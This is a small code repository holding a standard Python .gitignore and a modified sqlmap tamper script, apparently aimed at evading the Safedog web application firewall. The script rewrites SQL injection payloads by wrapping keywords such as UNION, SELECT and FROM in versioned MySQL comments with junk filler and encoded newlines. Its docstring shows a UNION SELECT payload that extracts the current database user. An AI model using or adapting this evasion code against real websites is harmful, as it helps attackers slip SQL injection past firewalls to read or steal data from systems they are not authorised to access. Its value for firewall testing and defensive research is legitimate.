├── .gitignore
└── test_safedog_3.py


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | env/
 12 | build/
 13 | develop-eggs/
 14 | dist/
 15 | downloads/
 16 | eggs/
 17 | .eggs/
 18 | lib/
 19 | lib64/
 20 | parts/
 21 | sdist/
 22 | var/
 23 | wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | 
 28 | # PyInstaller
 29 | #  Usually these files are written by a python script from a template
 30 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 31 | *.manifest
 32 | *.spec
 33 | 
 34 | # Installer logs
 35 | pip-log.txt
 36 | pip-delete-this-directory.txt
 37 | 
 38 | # Unit test / coverage reports
 39 | htmlcov/
 40 | .tox/
 41 | .coverage
 42 | .coverage.*
 43 | .cache
 44 | nosetests.xml
 45 | coverage.xml
 46 | *.cover
 47 | .hypothesis/
 48 | 
 49 | # Translations
 50 | *.mo
 51 | *.pot
 52 | 
 53 | # Django stuff:
 54 | *.log
 55 | local_settings.py
 56 | 
 57 | # Flask stuff:
 58 | instance/
 59 | .webassets-cache
 60 | 
 61 | # Scrapy stuff:
 62 | .scrapy
 63 | 
 64 | # Sphinx documentation
 65 | docs/_build/
 66 | 
 67 | # PyBuilder
 68 | target/
 69 | 
 70 | # Jupyter Notebook
 71 | .ipynb_checkpoints
 72 | 
 73 | # pyenv
 74 | .python-version
 75 | 
 76 | # celery beat schedule file
 77 | celerybeat-schedule
 78 | 
 79 | # SageMath parsed files
 80 | *.sage.py
 81 | 
 82 | # dotenv
 83 | .env
 84 | 
 85 | # virtualenv
 86 | .venv
 87 | venv/
 88 | ENV/
 89 | 
 90 | # Spyder project settings
 91 | .spyderproject
 92 | .spyproject
 93 | 
 94 | # Rope project settings
 95 | .ropeproject
 96 | 
 97 | # mkdocs documentation
 98 | /site
 99 | 
100 | # mypy
101 | .mypy_cache/
102 | 


--------------------------------------------------------------------------------
/test_safedog_3.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | """
 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
 5 | See the file 'doc/COPYING' for copying permission
 6 | *****************modify by Yuan-Yu Chen*************************
 7 | """
 8 | 
 9 | import os
10 | import re
11 | 
12 | from lib.core.common import singleTimeWarnMessage
13 | from lib.core.data import kb
14 | from lib.core.enums import DBMS
15 | from lib.core.enums import PRIORITY
16 | from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
17 | 
18 | __priority__ = PRIORITY.HIGHER
19 | 
20 | def dependencies():
21 |     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
22 | 
23 | def tamper(payload, **kwargs):
24 |     """
25 |     Encloses each keyword with versioned MySQL comment
26 | 
27 |     Requirement:
28 |         * MySQL >= 5.1.13
29 | 
30 |     Tested against:
31 |         * MySQL 5.1.56, 5.5.11
32 | 
33 |     Notes:
34 |         * Useful to bypass several web application firewalls when the
35 |           back-end database management system is MySQL
36 | 
37 |     >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
38 |     '1/*!00000/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/UNION%0a/*!/**/ALL*//*!/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/SELECT%0a*//*!/**/NULL*/,/*!/**/NULL*/,/*!/**/CONCAT*/(/*!/**/CHAR*/(58,122,114,115,58),/*!/**/IFNULL*/(CAST(/*!/**/CURRENT_USER*/()/*!/**/AS*//*!/**/CHAR*/),/*!/**/CHAR*/(32)),/*!/**/CHAR*/(58,115,114,121,58))#'
39 |     """
40 | 
41 |     def process(match):
42 |         word = match.group('word')
43 |         if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
44 |             if word == u"UNION":
45 |                 return match.group().replace(word, "/*!00000/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/%s" % word+chr(37)+'0a')
46 |             elif word == u"SELECT":
47 |                 return match.group().replace(word, "/*!/*|-sdfsdfadfadfdfasdf^^^^^^^-|*/%s" % word+chr(37)+'0a*/')
48 |             elif word == u"FROM":
49 |                 return match.group().replace(word, "/*!00000/*|-^^^-|*/*/"+chr(37)+"0a%s"% word)
50 |             return match.group().replace(word, "/*!/**/%s*/"% word)
51 |         else:
52 |             return match.group()
53 | 
54 |     retVal = payload
55 | 
56 |     if payload:
57 |         retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
58 |         retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
59 | 
60 |     return retVal
61 | 


--------------------------------------------------------------------------------